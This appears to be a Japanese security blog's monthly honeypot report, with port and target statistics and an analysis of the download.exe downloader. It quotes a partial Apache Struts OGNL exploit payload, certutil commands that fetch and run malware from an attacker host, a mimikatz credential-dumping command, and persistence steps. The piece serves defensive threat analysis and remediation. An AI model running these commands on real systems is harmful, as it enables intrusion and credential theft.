sec-chick Blog

サイバーセキュリティブログ

【ハニーポット月次分析】HoneyTrap 4月度〜download.exeの正体〜

4月度のHoneytrapの月次レポートとなります。今回はマルウェアであるdownload.exeについて深掘りして調査してみました。

4月度 Honeytrap 月次レポート(80ポートを除く)

1.全体の傾向
a.検知数

f:id:one-chick-sec:20190512101443p:plain

b.国別アクセスマッピング
検知数が多くなっている箇所はRDPのスキャンによって増加しています。RDPのスキャン時に広範囲のポートに行われるため、検知数が増加する傾向となっています。

f:id:one-chick-sec:20190512102336p:plain


c.ポート別検知数

宛先ポート 検知数
445 63244
3389 4013
8080 3901
222 2770
2222 2675
20022 2641
22222 2591
2211 2435
2022 2102
81 1932

SMBがトップであることは変わらず、SSHの通信が多い割合となっています。

d. ターゲット別集計

製品/対象 検知数
Realtek SDK 438
Apache Struts 138
Huawei Router HG532 126
Radius? 65
Backdoor 50
Linksys E-series 39
HooToo TM6 router 14
AVTECH IP Camera/NVR/DVR 11
Oracle WebLogic 4
Android Debug Bridge(ADB) 3
D-Link Devices 3
LG SuperSign CMS 3
Elasticsearch 3
Linux向け仮想通貨発掘マルウェア 2
ZTE ZXV10 H108L  1
Netgear R7000/R6400 1
MiOS Z-Wave home gateway 1


IoT製品およびApache Struts脆弱性を狙った攻撃が検知の大半を占めていました。また、Backdoor「FxCodeShell.jsp」の設置や確認する動きも増加傾向にあります。

IoT製品は Miraiおよび Gafgyt の亜種をダウンロードさせるものであり、Apache Struts はCVE-2017-5638(S2-045)の脆弱性を狙ったものであり、マルウェアのダウンロードを狙っていました。

今回はゼロデイであったWeblogic脆弱性(CVE-2019-2725)を狙った通信も検知していますが、マルウェアをダウンロードさせようとしているものは2件のみでした。

他にこれまでと大きく異なる脆弱性マルウェアの検知はありませんでした。

e. マルウェアダウンロード先(Top10)

マルウェアダウンロード先

分類 検知数
hxxp://fid[.]hognoob[.]se/download[.]exe Apache Struts 188
hxxp://176[.]56[.]237[.]213/[M] IoT 164
hxxp://w[.]3ei[.]xyz:43768/lll[.]sh Radius? 65
hxxp://185[.]161[.]70[.]150/mips IoT 61
hxxp://176[.]56[.]237[.]213/Demon[.]mips IoT 38
46[.]101[.]210[.]172 Huawei Router HG532 34
hxxp://185[.]52[.]1[.]95/Demon[.]mips IoT 34
hxxp://185[.]172[.]110[.]226/mips IoT 30
hxxp://185[.]161[.]70[.]165/mips IoT 24
hxxp://185[.]172[.]110[.]227/Corona[.]mips IoT 23

今月最も検知が多かったマルウェアURLは 「hxxp://fid[.]hognoob[.]se/download[.]exe」でした。こちらについては別途分析しているのでそちらを参照してください。

他については大きく傾向が変わったところはありませんでした。

 

2.download.exe の調査
今回、検知数が多かった download[.]exe について調査してみました。
マルウェアVirusTotalに登録されていますが機能面までは不明であったため、動的解析と他のサイトの情報を調査していました。
https://www.virustotal.com/#/file/8c0d73a19780c83d8a6305abf8a6cbbf62e5b4abc28f56b6fea967583d1a16c7/detection

マルウェアですが、以前のダウンロード先はhxxp://a46[.]bulehero[.]in/download[.]exe でしたが、ここ最近で変更されました。拡張子はexeファイルであることからwindowsサーバを対象に狙っていると思われます。
攻撃で利用されるペイロード例は以下となります。

GET /struts2-rest-showcase/orders.xhtml HTTP/1.1.
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):
〜省略〜
(#cmd='cmd.exe /c certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/download.exe C:/Windows/temp/zsxvmpnktkgjzqr14303[.]exe & cmd.exe /c C:/Windows/temp/zsxvmpnktkgjzqr14303.exe')
〜省略〜

download.exe実行後はマルウェア本体と思われるwercplshost.exeをダウンロードするため、以下のコマンドを実行します。
cmd.exe /c certutil.exe -urlcache -split -f hxxp://fid[.]hognoob[.]se/wercplshost[.]exe %SystemRoot%\Temp\wercplshost.exe & %SystemRoot%\Temp\wercplshost[.]exe

f:id:one-chick-sec:20190512150748p:plain
このことからdownload.exeはダウンローダと推測できます。ダウンロードされるマルウェアVirusTotal上で多くのベンダからマルウェア判定されています。
https://www.virustotal.com/#/file/9ac977087c08face38d8993db5cc26048f68d412243216887a61130d95150988/detection

ダウンロード後は以下のようなコマンドを実行し、情報収集や永続化を試みます。
※1例となります。


cmd /c C:\WINDOWS\dispmrroe\Coolmaster\SerachPortocoiHost.exe -p80 192.168.xxx.xxx/24 --rate=4096
SerachPortocoiHost.exe の詳細は特定できませんでしたが、コマンド内容からローカルIPで空いているポート80を探索するものと推測できます。他にも-p


cmd /c C:\WINDOWS\dispmrroe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\WINDOWS\dispmrroe\Corporate\log.txt
本コマンドは mimikatz でOS内に保存された認証情報を搾取するコマンドとなります。vfshost.exe はmimikatz であり、実際に該当のパスに保存されているファイルを確認したところ、認証情報が記載されていました。
https://jpcertcc.github.io/ToolAnalysisResultSheet_jp/details/Mimikatz_sekurlsa-logonpasswords.htm

 


c:\windows\system32\cmd.EXE /c echo Y|cacls C:\WINDOWS\miagration\wercplshost.exe /p everyone:F

c:\windows\system32\cmd.EXE /c echo Y|cacls C:\WINDOWS\TEMP\locales\taskmgr.exe /p everyone:F

永続化を行うためにタスクスケジューラへ登録を行っています。また、wercplshost.exe も自動起動するようになっているため、これらのタスクスケジュールにより再起動後もマルウェアが実行される仕組みとなっています。マルウェア自動起動を削除するためにはタスクスケジューラから該当のスケジュールにする HispDemon、wercpsypostおよびTablteInputoutを削除する必要があります。

f:id:one-chick-sec:20190512150255j:plain

ここからの情報は動的解析上ではうまく分析できませんでしたが、以下のサイトに分析情報が記載されていました。
https://translate.google.com/translate?hl=ja&sl=zh-CN&u=https://www.4hou.com/system/16690.html&prev=search

以降は空いているポートや製品に該当するExploitコードを用いて「FxCodeShell.jsp」を設置するとの報告もありました。download.exeで脆弱性を調査し、FxCodeShell.jspを設置するため、この二つのマルウェアは関連性が高いと思われます。

マルウェアを駆除するためには、以下のファイル、ディレクトリ、タスクを削除する必要があります。
※これ以外にも存在する可能性や名前が変更されている可能性があります。

該当ファイルを削除:

C:\ Windows \ miagration \ wercplshost.exe

C:\ Windows \ Temp \ locales \ taskmgr.exe

C:/ユーザー/ [GUID] /AppData/Local/Temp/nmbsawer.exe

該当ディレクトリを削除:

C:\ Windows \ dispmrroe \ Coolmaster

C:\ Windows \ dispmrroe \ UnattendGC

C:\ Windows \ dispmrroe \ Corporate

スケジュール済みタスクを削除

タスク名:TabltteInputout

cmd / c echo Y | cacls C:\ Windows \ miagration \ wercplshost.exe / p皆:F

タスク名:werclpsyport

cmd / c echo Y | cacls C:\ Windows \ TEMP \ locales \ taskmgr.exe / p everyone:F


タスク名:HispDemon
cmd /c C:\ Windows \ ime \ wercplshost.exe


以上、月次分析となります。